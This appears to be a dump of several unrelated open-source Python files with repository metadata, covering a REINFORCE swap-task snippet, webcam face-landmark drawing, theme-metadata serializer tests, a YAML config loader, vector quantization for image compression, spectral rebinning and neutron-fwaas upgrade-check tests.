    separator = "0"  # "0" is reserved as the separator/blank symbol
    ghu.fill_layers(separator)

    # training example generation
    def training_example():
        """Return (inputs, targets): two distinct non-separator symbols and their swap."""
        # Randomly choose swap symbols (excluding 0 separator)
        inputs = np.random.choice(symbols[1:], size=2, replace=False)
        targets = inputs[::-1]
        return inputs, targets

    # reward calculation based on leading LVD at individual steps
    def reward(ghu, targets, outputs):
        """Reward +1/-1 at each step that produced a non-separator output,
        depending on whether the Levenshtein-distance matrix stays on the
        diagonal (i.e. the output so far still matches the targets)."""
        idx = [i for i, out in enumerate(outputs) if out != separator]  # steps with real output
        outputs_ = [out for out in outputs if out != separator]
        _, d = lvd(outputs_, targets)  # d: Levenshtein distance matrix from lvd()
        r = np.zeros(len(outputs))
        for i in range(1,d.shape[0]):
            r[idx[i-1]] = +1. if (i < d.shape[1] and d[i,i] == d[i-1,i-1]) else -1.
        return r

    # Run optimization
    avg_rewards, grad_norms = reinforce(ghu,
        num_epochs = 100,
        episode_duration = 3,
        training_example = training_example,
        reward = reward,
        task = "swap",
        learning_rate = .2,
        # line_search_iterations = 5,
        # distribution_cap = .1,
        # likelihood_cap = .7,
        distribution_variance_coefficient = 0.01,
        verbose = 1)

    # Plot the learning curve and gradient norms
    pt.figure(figsize=(4,3))
    pt.subplot(2,1,1)
    pt.plot(avg_rewards)
    pt.title("Learning curve")
    pt.ylabel("Avg Reward")
    pt.subplot(2,1,2)
    pt.plot(grad_norms)
    pt.xlabel("Epoch")
    pt.ylabel("||Grad||")
    pt.tight_layout()
    pt.show()
| 30.753086 | 83 | 0.608591 | 316 | 2,491 | 4.664557 | 0.439873 | 0.033921 | 0.024423 | 0.028494 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02603 | 0.259735 | 2,491 | 80 | 84 | 31.1375 | 0.773319 | 0.140506 | 0 | 0 | 0 | 0 | 0.055111 | 0.025907 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033898 | false | 0 | 0.135593 | 0 | 0.20339 | 0.016949 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41aa2d6b40a21820a8c6f0096cf82ccb5a78479c | 1,103 | py | Python | face-alignment.py | binhmuc/faced | cbc18f552da9c53628d61d56de7dfda451a6e25f | [
"MIT"
] | null | null | null | face-alignment.py | binhmuc/faced | cbc18f552da9c53628d61d56de7dfda451a6e25f | [
"MIT"
] | null | null | null | face-alignment.py | binhmuc/faced | cbc18f552da9c53628d61d56de7dfda451a6e25f | [
"MIT"
] | null | null | null | import face_alignment
from skimage import io
import cv2
from skimage import img_as_float
from skimage import io
import matplotlib.pyplot as plt
from faced import FaceDetector
from faced.utils import annotate_image
import time
# Build the SFD-based 2D facial landmark detector and open the default webcam.
fa = face_alignment.FaceAlignment(face_alignment.LandmarksType._2D, face_detector='sfd')
video = cv2.VideoCapture(0)
def draw(fr, Z):
    """Paint each landmark point in Z as a filled 2-px white dot on frame fr."""
    for point in Z:
        cv2.circle(fr, point, 2, (225, 255, 255), -1)
    return fr
# Main capture loop: detect landmarks per frame, overlay them plus a running
# FPS figure, quit on ESC.
frame_count = 0
tt_opencvHaar = 0
while True:
    # Bug fix: the frame timer was started *after* all the work (so the
    # accumulated time was ~0 and the FPS figure was meaningless). Start
    # timing at the top of the iteration instead.
    t = time.time()
    _, fr = video.read()
    predss = fa.get_landmarks(fr)
    if predss is not None:
        for preds in predss:
            # first 68 rows are the standard facial landmark set
            Z = zip(preds[0:68, 0], preds[0:68, 1])
            fr = draw(fr, Z)
    ##GET fps
    frame_count += 1
    tt_opencvHaar += time.time() - t
    # Guard against division by zero on extremely fast first frames.
    fpsOpencvHaar = frame_count / tt_opencvHaar if tt_opencvHaar > 0 else 0.0
    label = "FPS : {:.2f}".format(fpsOpencvHaar)
    cv2.putText(fr, label, (10, 50), cv2.FONT_HERSHEY_SIMPLEX, 1.4, (0, 0, 255), 3, cv2.LINE_AA)
    if frame_count == 1:
        tt_opencvHaar = 0  # discard the first (warm-up) frame from the average
    #---------------------------#
    cv2.imshow('image', fr)
    if cv2.waitKey(1) == 27:  # ESC quits
        break
cv2.destroyAllWindows()
| 23.978261 | 94 | 0.664551 | 170 | 1,103 | 4.188235 | 0.464706 | 0.05618 | 0.071629 | 0.053371 | 0.070225 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057239 | 0.192203 | 1,103 | 45 | 95 | 24.511111 | 0.741863 | 0.030825 | 0 | 0.111111 | 0 | 0 | 0.019608 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0 | 0.25 | 0 | 0.305556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41ac00fd9043a9b17ba6e49efc0299f2d40364b0 | 847 | py | Python | tests/test_fingers/test_theme/test_models.py | sonirico/wpoke | be193a41159dabf912d793eb5a6ebf2f0e9440bb | [
"MIT"
] | 4 | 2019-08-19T12:32:40.000Z | 2019-10-25T20:57:29.000Z | tests/test_fingers/test_theme/test_models.py | sonirico/wpoke | be193a41159dabf912d793eb5a6ebf2f0e9440bb | [
"MIT"
] | 15 | 2019-07-15T18:30:43.000Z | 2020-09-25T08:10:05.000Z | tests/test_fingers/test_theme/test_models.py | sonirico/wpoke | be193a41159dabf912d793eb5a6ebf2f0e9440bb | [
"MIT"
] | null | null | null | import unittest
from wpoke.fingers.theme.models import WPThemeMetadata
from wpoke.fingers.theme.serializers import WPThemeMetadataSerializer
class TestWPThemeMetadata(unittest.TestCase):
    """Serialization behaviour of WPThemeMetadata via WPThemeMetadataSerializer."""

    def test_serialize_empty_values(self):
        """A fresh model serializes with a list for tags and a null theme name."""
        serialized = WPThemeMetadataSerializer(WPThemeMetadata()).data
        self.assertIsInstance(serialized["tags"], list)
        self.assertIsNone(serialized["theme_name"])

    def test_serialize_tags_field(self):
        """A comma-separated tag string is split (and whitespace-stripped) into a list."""
        model = WPThemeMetadata()
        model.tags = "hacking, programming , devops"
        serialized = WPThemeMetadataSerializer(model).data
        self.assertListEqual(serialized["tags"], ["hacking", "programming", "devops"])
| 35.291667 | 88 | 0.747344 | 85 | 847 | 7.188235 | 0.423529 | 0.081833 | 0.12275 | 0.06874 | 0.369885 | 0.258592 | 0.258592 | 0.258592 | 0.258592 | 0.258592 | 0 | 0 | 0.168831 | 847 | 23 | 89 | 36.826087 | 0.867898 | 0 | 0 | 0.375 | 0 | 0 | 0.085006 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 1 | 0.125 | false | 0 | 0.1875 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41ae040201f6c28a176e8746c32a9793421e405a | 2,989 | py | Python | src/Config.py | albertomn86/Weather-Station-Receiver | 53745e51e8227ab40ced665ec0083bfd62a951da | [
"Apache-2.0"
] | 1 | 2020-01-13T20:56:49.000Z | 2020-01-13T20:56:49.000Z | src/Config.py | albertomn86/Weather-Station-Receiver | 53745e51e8227ab40ced665ec0083bfd62a951da | [
"Apache-2.0"
] | null | null | null | src/Config.py | albertomn86/Weather-Station-Receiver | 53745e51e8227ab40ced665ec0083bfd62a951da | [
"Apache-2.0"
] | null | null | null | from yaml import safe_load, YAMLError
from os import path
from src.Device import Device
from typing import Any, Optional
class Config(object):
    """Typed view over the application's YAML configuration file.

    The receiver serial port, the optional upload settings and the device
    list are parsed once at construction time and exposed via accessors.
    """

    def __init__(self, file: str):
        """Load and validate the YAML file at ``file``.

        Raises FileNotFoundError if the path does not exist and
        ConfigException if the file is unparsable, empty or incomplete.
        """
        if not path.exists(file):
            raise FileNotFoundError(f"Config file not found: {file}")
        with open(file, 'r') as stream:
            try:
                self.__config = safe_load(stream)
            except YAMLError:
                raise ConfigException(f"Invalid configuration file: {file}")
        if self.__config is None:
            raise ConfigException(f"Empty configuration file: {file}")
        self.__serial_port = Config.__parse_receiver(self.__config)
        self.__upload_addres, self.__upload_api_key = \
            Config.__parse_upload(self.__config)
        (self.__devices_list,
         self.__allowed_devices_id_list,
         self.__devices_with_subsciption) = Config.__parse_devices(self.__config)

    @staticmethod
    def __parse_receiver(config: dict) -> str:
        """Return Receiver.SerialPort, raising ConfigException when absent."""
        section = config.get("Receiver")
        if section is None:
            raise ConfigException("Serial port not specified")
        port = section.get("SerialPort")
        if port is None:
            raise ConfigException("Serial port not specified")
        return port

    @staticmethod
    def __parse_upload(config: dict) -> tuple[Optional[Any], Optional[Any]]:
        """Return (address, api_key) from the optional Upload section (None when missing)."""
        section = config.get("Upload")
        if section is None:
            return None, None
        return section.get("Address"), section.get("ApiKey")

    @staticmethod
    def __parse_devices(config: dict) -> \
            tuple[list[Device], list[Any], list[Any]]:
        """Build the device objects, their unique id list and the subscription devices."""
        entries = config.get("Devices")
        if entries is None:
            raise ConfigException("No devices found")
        devices = []
        seen_ids = []
        subscriptions = []
        for entry in entries:
            candidate = Device(entry)
            if candidate.id in seen_ids:
                continue  # duplicate id: first definition wins
            seen_ids.append(candidate.id)
            devices.append(candidate)
            if candidate.subscription_device is not None:
                subscriptions.append(candidate.subscription_device)
        return devices, seen_ids, subscriptions

    def get_valid_devices_id_list(self) -> list:
        """Return the list of unique configured device ids."""
        return self.__allowed_devices_id_list

    def get_device_by_id(self, id: str) -> Device:
        """Return the configured device whose id matches (IndexError when absent)."""
        matches = [device for device in self.__devices_list if device.id == id]
        return matches[0]

    def get_devices_with_subscription(self) -> list:
        """Return the subscription devices declared by the configured devices."""
        return self.__devices_with_subsciption

    def get_receiver_serial_port(self) -> str:
        """Return the configured receiver serial port."""
        return self.__serial_port

    def get_upload_address(self) -> Optional[Any]:
        """Return the upload endpoint address, or None when not configured."""
        return self.__upload_addres

    def get_upload_api_key(self) -> Optional[Any]:
        """Return the upload API key, or None when not configured."""
        return self.__upload_api_key
class ConfigException(Exception):
    """Raised for invalid, empty or incomplete configuration files."""
    pass
| 31.797872 | 76 | 0.636333 | 354 | 2,989 | 5.031073 | 0.214689 | 0.039304 | 0.020213 | 0.029197 | 0.113419 | 0.086468 | 0.051656 | 0.051656 | 0 | 0 | 0 | 0.000465 | 0.280027 | 2,989 | 93 | 77 | 32.139785 | 0.827138 | 0 | 0 | 0.042254 | 0 | 0 | 0.060555 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.140845 | false | 0.014085 | 0.056338 | 0.084507 | 0.352113 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41af722e2abcb956634da9556cf5120ca6d46ddf | 6,316 | py | Python | cwVQ.py | USC-MCL/Func-Pool | 20c43df0eb2da68d8d2e01c03d66a1a4e4e06081 | [
"MIT"
] | 3 | 2020-01-24T19:03:44.000Z | 2021-04-13T17:22:36.000Z | cwVQ.py | USC-MCL/Func-Pool | 20c43df0eb2da68d8d2e01c03d66a1a4e4e06081 | [
"MIT"
] | null | null | null | cwVQ.py | USC-MCL/Func-Pool | 20c43df0eb2da68d8d2e01c03d66a1a4e4e06081 | [
"MIT"
] | 3 | 2020-01-24T19:03:45.000Z | 2020-04-13T08:27:13.000Z | # 2020.10.19
# @yifan
# channel-wise VQ
# input is asumed to be DCT/PCA coefficients
#
import numpy as np
from sklearn import cluster
import copy
from skimage.metrics import mean_squared_error
from sklearn.metrics.pairwise import euclidean_distances
from myPCA import myPCA
from util import *
def check_mse(X, km, PSNR_TH):
    """Return (mse, ok): reconstruction MSE of X under codebook km and
    whether it meets the PSNR target PSNR_TH (in dB, for 8-bit data)."""
    threshold = 255 ** 2 / pow(10, PSNR_TH / 10)  # PSNR (dB) -> equivalent MSE bound
    reconstructed = km.cluster_centers_[km.predict(X)]
    mse = mean_squared_error(X, reconstructed)
    return mse, mse <= threshold
class cwVQ():
    """Channel-wise vector quantizer.

    The feature dimension is split into groups at the indices in ``cw_idx``
    (group i covers columns cw_idx[i-1]:cw_idx[i]) and an independent k-means
    codebook is trained per group.  Each codebook starts with cw_N[i-1]
    codewords and is grown until the group's reconstruction PSNR reaches
    ``PSNR_TH`` dB (capped at 200x the initial size).

    Fix over the original: two leftover debug prints were removed —
    ``print(np.std(tmp))`` in fit() and ``print(idx[1][:10], ...)`` in
    decode(); the latter crashed with IndexError whenever fewer than two
    channel groups were configured.
    """
    # cw_idx: group boundary indices into the feature dimension
    # cw_N: initial num codewords for each group (updated in place by fit)
    def __init__(self, cw_idx, cw_N, PSNR_TH):
        self.cw_idx = cw_idx
        self.cw_N = cw_N
        self.PSNR_TH = PSNR_TH        # per-group reconstruction target in dB
        self.km_list = []             # fitted KMeans object per group
        self.cent_list = []           # codebook (cluster centers) per group
        self.dim = 0                  # full feature dimension seen in fit()
        self.trained = False

    def fit(self, X):
        """Train one codebook per channel group on X of shape (n_samples, dim)."""
        self.dim = X.shape[-1]
        print(" \033[32m---> cwVQ, num of raining smaples: %d"%(X.shape[0]))
        for i in range(1, len(self.cw_idx)):
            tmp = X[:, self.cw_idx[i-1]:self.cw_idx[i]]
            N = self.cw_N[i-1]
            # Grow the codebook until the PSNR target is met (200x cap).
            while N < 200 * self.cw_N[i-1]:
                km = cluster.KMeans(n_clusters=int(N), n_init=7)
                km.fit(tmp)
                mse, flag = check_mse(tmp, km, self.PSNR_TH)
                if flag == True:
                    print("     ---> MSE=%3f nice, stop"%(mse))
                    break
                N += 1
                print("     ---> MSE=%3f too large, increase N to %2d"%(mse, N))
            self.cw_N[i-1] = N
            print("     <INFO> Finish training feature idx %d - %d, with N=%d" %(self.cw_idx[i-1], self.cw_idx[i], self.cw_N[i-1]))
            # NOTE(review): this sorts each centroid coordinate independently,
            # reordering/altering codewords — confirm intended.
            km.cluster_centers_.sort(axis=0)
            self.km_list.append(km)
            self.cent_list.append(km.cluster_centers_)
        print("\033[0m")
        self.trained = True

    def encode(self, X):
        """Return a list of per-group nearest-codeword index arrays for X."""
        assert (self.trained == True), " \033[0;91m<ERROR> Call fit first!\033[0m"
        idx = []
        for i in range(1, len(self.cw_idx)):
            tmp = X[:, self.cw_idx[i-1]:self.cw_idx[i]]
            # Nearest centroid by L2 distance (equivalent to km.predict on the
            # sorted centers stored in cent_list).
            tmp_idx = np.argmin(euclidean_distances(tmp, self.cent_list[i-1]), axis=1)
            idx.append(tmp_idx)
        return idx

    def decode(self, idx):
        """Reconstruct features from per-group codeword indices, zero-padded to self.dim."""
        assert (self.trained == True), " \033[0;91m<ERROR> Call fit first!\033[0m"
        res = []
        for i in range(len(idx)):
            tmp = self.cent_list[i][idx[i]]
            res.append(tmp)
        res = np.concatenate(res, axis=1)
        if res.shape[-1] < self.dim:
            # The groups may not cover the full dimension: pad the tail with zeros.
            res = np.concatenate((res, np.zeros((res.shape[0], self.dim-res.shape[-1]))), axis=1)
        return res
class cwVQ4D(cwVQ):
    # 4-D (image) front end for cwVQ: win x win patches are flattened to rows,
    # optionally transformed (mode 1: DCT + zig-zag, mode 2: PCA), quantized
    # channel-wise, then mapped back.
    def __init__(self, cw_idx, cw_N, PSNR_TH, win, mode=0):
        super().__init__(cw_idx, cw_N, PSNR_TH)
        self.win = win    # patch window size
        self.mode = mode  # 0: raw patches, 1: DCT + zig-zag, 2: PCA
        self.pca = myPCA(n_components=-1)
    def to2D(self, X, train=True):
        """Flatten 4-D input into (n, win**2) rows; returns (rows, shape before flattening)."""
        X = Shrink(X, {'win':self.win})
        if self.mode == 1:
            X = DCT(X)
            X = ZigZag().transform(X)
        elif self.mode == 2:
            if train == True:
                self.pca.fit(X)
            # NOTE(review): the return value of transform() is discarded —
            # probably should be `X = self.pca.transform(X)` unless myPCA
            # operates in place; confirm against myPCA.
            self.pca.transform(X)
        return X.reshape(-1, self.win**2), X.shape
    def to4D(self, X, S):
        """Inverse of to2D: restore shape S and undo the optional transform."""
        X = X.reshape(S)
        if self.mode == 1:
            X = ZigZag().inverse_transform(X)
            X = IDCT(X)
        elif self.mode == 2:
            # NOTE(review): same discarded-return concern as in to2D.
            self.pca.inverse_transform(X)
        return invShrink(X, {'win':self.win})
    def fit(self, X):
        """Flatten the 4-D input and train the channel-wise codebooks."""
        X, _ = self.to2D(X, train=True)
        super().fit(X)
    def encode(self, X):
        """Return (per-group index arrays, shape) needed by decode."""
        X, S = self.to2D(X, train=False)
        return super().encode(X), S
    def decode(self, idx, S):
        """Reconstruct the 4-D data from the index arrays and stored shape S."""
        res = super().decode(idx)
        return self.to4D(res, S)
class kmVQ():
    # Plain (single-codebook) k-means vector quantizer with N codewords;
    # baseline counterpart to the channel-wise cwVQ.
    def __init__(self, N):
        self.km = cluster.KMeans(n_clusters=int(N), n_init=7)
        self.cent = []  # codebook, filled by fit()
    def fit(self, X):
        """Fit the codebook on X of shape (n_samples, dim)."""
        print(" \033[32m---> VQ, num of raining smaples: %d"%(X.shape[0]))
        self.km.fit(X)
        self.cent = self.km.cluster_centers_
    def encode(self, X):
        """Return the nearest-codeword index for each row of X."""
        return self.km.predict(X)
    def decode(self, idx):
        """Map codeword indices back to codebook vectors."""
        return self.cent[idx]
class kmVQ4D(kmVQ):
    """4-D (image) front end for kmVQ.

    win x win patches are flattened to rows, optionally transformed
    (mode 1: DCT + zig-zag, mode 2: PCA), quantized with a single codebook,
    then mapped back.  to2D/to4D mirror cwVQ4D's implementation.

    Fix over the original: a duplicated ``self.mode = mode`` assignment in
    __init__ was removed.
    """
    def __init__(self, N, win, mode=0):
        super().__init__(N)
        self.win = win    # patch window size
        self.mode = mode  # 0: raw patches, 1: DCT + zig-zag, 2: PCA
        self.pca = myPCA(n_components=32)
    def to2D(self, X, train=True):
        """Flatten 4-D input into (n, win**2) rows; returns (rows, shape before flattening)."""
        X = Shrink(X, {'win':self.win})
        if self.mode == 1:
            X = DCT(X)
            X = ZigZag().transform(X)
        elif self.mode == 2:
            if train == True:
                self.pca.fit(X)
            # NOTE(review): the return value of transform() is discarded —
            # probably should be `X = self.pca.transform(X)` unless myPCA
            # operates in place; confirm against myPCA.
            self.pca.transform(X)
        return X.reshape(-1, self.win**2), X.shape
    def to4D(self, X, S):
        """Inverse of to2D: restore shape S and undo the optional transform."""
        X = X.reshape(S)
        if self.mode == 1:
            X = ZigZag().inverse_transform(X)
            X = IDCT(X)
        elif self.mode == 2:
            # NOTE(review): same discarded-return concern as in to2D.
            self.pca.inverse_transform(X)
        return invShrink(X, {'win':self.win})
    def fit(self, X):
        """Flatten the 4-D input and train the single codebook."""
        X, _ = self.to2D(X, train=True)
        super().fit(X)
    def encode(self, X):
        """Return (index array, shape) needed by decode."""
        X, S = self.to2D(X, train=False)
        return super().encode(X), S
    def decode(self, idx, S):
        """Reconstruct the 4-D data from the indices and stored shape S."""
        res = super().decode(idx)
        return self.to4D(res, S)
if __name__ == "__main__":
    # Demo / sanity check: quantize one Kodak image with the channel-wise VQ
    # and compare against a plain VQ using the same total number of codewords.
    import time
    from evaluate import *
    import cv2
    X = cv2.imread("/Users/alex/Desktop/proj/compression/data/Kodak/kodim01.png", 0)
    X = X.reshape(1, X.shape[0], X.shape[1], 1)  # -> (batch, H, W, channel)
    t0 = time.time()
    vq = cwVQ4D(cw_idx=[0, 1, 2, 3, 4],
                cw_N=[6, 7, 7, 7],
                PSNR_TH=30,
                win=2)
    vq.fit(X)
    # deepcopy guards against in-place modification of X during encoding
    idx, S = vq.encode(copy.deepcopy(X))
    iX = vq.decode(idx, S)
    print(' \033[37m-->cwVQ using %s codewords, PSNR=%f, using time %5f sec'%(str(vq.cw_N), PSNR(X, iX), time.time()-t0))
    t0 = time.time()
    # Baseline: one flat codebook with the same total codeword budget.
    km = kmVQ4D(np.sum(vq.cw_N), 2)
    km.fit(X)
    idx, S = km.encode(X)
    iX = km.decode(idx, S)
    print(' -->VQ using %d codewords, PSNR=%f, using time %5f sec\033[0m'%(np.sum(vq.cw_N), PSNR(X, iX), time.time()-t0))
| 33.417989 | 131 | 0.528816 | 957 | 6,316 | 3.375131 | 0.174504 | 0.029721 | 0.03065 | 0.018576 | 0.501858 | 0.466873 | 0.460681 | 0.419505 | 0.381115 | 0.345511 | 0 | 0.036128 | 0.316339 | 6,316 | 188 | 132 | 33.595745 | 0.711904 | 0.028024 | 0 | 0.439759 | 0 | 0 | 0.088922 | 0.009626 | 0 | 0 | 0 | 0 | 0.012048 | 1 | 0.126506 | false | 0 | 0.060241 | 0.012048 | 0.295181 | 0.060241 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41b1d06924eae19655ba9eb1faf5d08b5dbcc871 | 2,384 | py | Python | polsalt/scrunch1d.py | Richard-Tarbell/polsalt | e953985ffbc786fd071d0b48ebca5bd1dac9a960 | [
"BSD-3-Clause"
] | 1 | 2017-09-22T17:04:06.000Z | 2017-09-22T17:04:06.000Z | polsalt/scrunch1d.py | Richard-Tarbell/polsalt | e953985ffbc786fd071d0b48ebca5bd1dac9a960 | [
"BSD-3-Clause"
] | 14 | 2015-12-22T17:56:38.000Z | 2021-07-30T15:36:23.000Z | polsalt/scrunch1d.py | Richard-Tarbell/polsalt | e953985ffbc786fd071d0b48ebca5bd1dac9a960 | [
"BSD-3-Clause"
] | 12 | 2015-12-21T15:12:44.000Z | 2021-08-12T18:58:12.000Z | #! /usr/bin/env python
# Resample data into new bins, preserving flux
# New version 150912, much faster
# New version 170504, fixed case where output bin coverage is larger than input bin coverage
# New version 170909, again fixed case where output bin coverage is larger than input bin coverage
import os, sys, time, glob, shutil
import numpy as np
def scrunch1d(input,binedge):
    """Resample *input* into new bins, preserving total flux.

    ``binedge`` holds the nx+1 edges of the nx output bins, expressed in a
    coordinate system x where the left edge of input bin 0 is at 0.0 and
    every input bin has width 1.  Output bins (or parts of them) lying
    outside the input coverage [0, na] receive zero flux.

    NOTE(review): the parameter name ``input`` shadows the Python builtin.
    """
    # new binedges are in coordinate system x where the left edge of the 0th input bin is at 0.0
    na = input.size                     # number of input bins
    nx = binedge.size - 1               # number of output bins
    input_a = np.append(input,0)        # deal with edge of array (sentinel bin past the end)
    # okxbin flags output bins that overlap the input coverage;
    # okxedge flags every bin edge that touches at least one such bin.
    # okxbin = ((binedge>=0) & (binedge<=na))
    okxbin = ((binedge[1:]>0) & (binedge[:-1]<na))
    okxedge = np.zeros(binedge.size,dtype=bool)
    okxedge[:-1] |= okxbin
    okxedge[1:] |= okxbin
    output_x = np.zeros(nx)
    # _s: subbins divided by both new and old bin edges
    ixmin,ixmax = np.where(okxedge)[0][[0,-1]]   # first/last useful output edge
    iamin = int(binedge[ixmin])
    iamax = int(binedge[ixmax])
    # merge covered output edges with the integer (input) edges; np.unique
    # sorts them and argsort_s records where each edge came from
    x_s = np.append(binedge[okxedge],range(int(np.ceil(binedge[ixmin])),iamax+1))
    x_s,argsort_s = np.unique(x_s,return_index=True)
    x_s = np.maximum(x_s,0.)            # 20170909: deal with edge of array
    x_s = np.minimum(x_s,na)            # 20170909: deal with edge of array
    ia_s = x_s.astype(int)              # input-bin index at each subbin's left edge
    # ix_s: output bin owning each subbin; entries that originate from input
    # edges start at -1 and inherit the index of the preceding output edge
    ix_s = np.append(np.arange(ixmin,ixmax+1),-1*np.ones(iamax-iamin+1))[argsort_s].astype(int)
    while (ix_s==-1).sum():
        ix_s[ix_s==-1] = ix_s[np.where(ix_s==-1)[0] - 1]
    # np.savetxt("scrout_s.txt",np.vstack((ia_s,ix_s,x_s)).T,fmt="%5i %5i %10.4f")
    # divide data into subbins, preserving flux
    ix_x = np.zeros(nx+1).astype(int)
    s_x = np.zeros(nx+1).astype(int)
    input_s = input_a[ia_s[:-1]]*(x_s[1:] - x_s[:-1])   # subbin flux = input density * subbin width
    ix_x[ixmin:(ixmax+1)], s_x[ixmin:(ixmax+1)] = np.unique(ix_s,return_index=True)
    ns_x = s_x[1:] - s_x[:-1]           # how many subbins land in each output bin
    # np.savetxt("scrout_x.txt",np.vstack((ix_x,np.append(ns_x,[0]),s_x)).T,fmt="%5i")
    # sum it into the new bins: pass s adds every bin's s-th subbin at once
    for s in range(ns_x.max()):
        output_x[ns_x > s] += input_s[s_x[:nx][ns_x > s]+s]
    return output_x
if __name__=='__main__':
    # CLI usage: scrunch1d.py <input_values_file> <binedge_file>
    # Writes the rebinned data to outputfile.txt in the working directory.
    input=np.loadtxt(sys.argv[1])
    binedge=np.loadtxt(sys.argv[2])
    # for n in range(1000): scrunch1d(input,binedge)   # benchmark loop (disabled)
    np.savetxt('outputfile.txt',scrunch1d(input,binedge),fmt="%14.8f")
| 40.40678 | 98 | 0.622903 | 411 | 2,384 | 3.472019 | 0.294404 | 0.019622 | 0.044149 | 0.029432 | 0.167484 | 0.148563 | 0.110722 | 0.082691 | 0.082691 | 0.082691 | 0 | 0.046088 | 0.217282 | 2,384 | 58 | 99 | 41.103448 | 0.71865 | 0.362836 | 0 | 0 | 0 | 0 | 0.018629 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029412 | false | 0 | 0.058824 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41b47d2a2fab71fffa7fa7dc8edb5358a58ea4bf | 1,686 | py | Python | neutron_fwaas/tests/unit/cmd/upgrade_checks/test_checks.py | sapcc/neutron-fwaas | 59bad17387d15f86ea7d08f8675208160a999ffe | [
"Apache-2.0"
] | null | null | null | neutron_fwaas/tests/unit/cmd/upgrade_checks/test_checks.py | sapcc/neutron-fwaas | 59bad17387d15f86ea7d08f8675208160a999ffe | [
"Apache-2.0"
] | null | null | null | neutron_fwaas/tests/unit/cmd/upgrade_checks/test_checks.py | sapcc/neutron-fwaas | 59bad17387d15f86ea7d08f8675208160a999ffe | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import cfg
from oslo_upgradecheck.upgradecheck import Code
from neutron_fwaas.cmd.upgrade_checks import checks
from neutron_fwaas.tests import base
class TestChecks(base.BaseTestCase):
    """Unit tests for the FWaaS upgrade-status checks."""

    def setUp(self):
        super(TestChecks, self).setUp()
        self.checks = checks.Checks()

    def test_get_checks_list(self):
        # get_checks() must expose the registered checks as a list.
        self.assertIsInstance(self.checks.get_checks(), list)

    def test_fwaas_v1_check_success(self):
        # Fixed typo in the method name (was "test_fwaas_v1_check_sucess").
        # With no firewall plugin in service_plugins the check succeeds.
        cfg.CONF.set_override('service_plugins', ['l3', 'qos'])
        check_result = checks.Checks.fwaas_v1_check(mock.Mock())
        self.assertEqual(Code.SUCCESS, check_result.code)

    def test_fwaas_v1_check_warning(self):
        # Both the short alias and the full class path of the FWaaS v1
        # plugin must make the check report a failure.
        plugins_to_check = [
            ['l3', 'firewall', 'qos'],
            ['l3',
             'neutron_fwaas.services.firewall.fwaas_plugin:FirewallPlugin',
             'qos']]
        for plugins in plugins_to_check:
            cfg.CONF.set_override('service_plugins', plugins)
            check_result = checks.Checks.fwaas_v1_check(mock.Mock())
            self.assertEqual(Code.FAILURE, check_result.code)
| 35.87234 | 75 | 0.707592 | 228 | 1,686 | 5.078947 | 0.47807 | 0.051813 | 0.041451 | 0.027634 | 0.195164 | 0.162349 | 0.107081 | 0.107081 | 0.107081 | 0.107081 | 0 | 0.011128 | 0.200475 | 1,686 | 46 | 76 | 36.652174 | 0.847923 | 0.326216 | 0 | 0.08 | 0 | 0 | 0.099822 | 0.052585 | 0 | 0 | 0 | 0 | 0.12 | 1 | 0.16 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
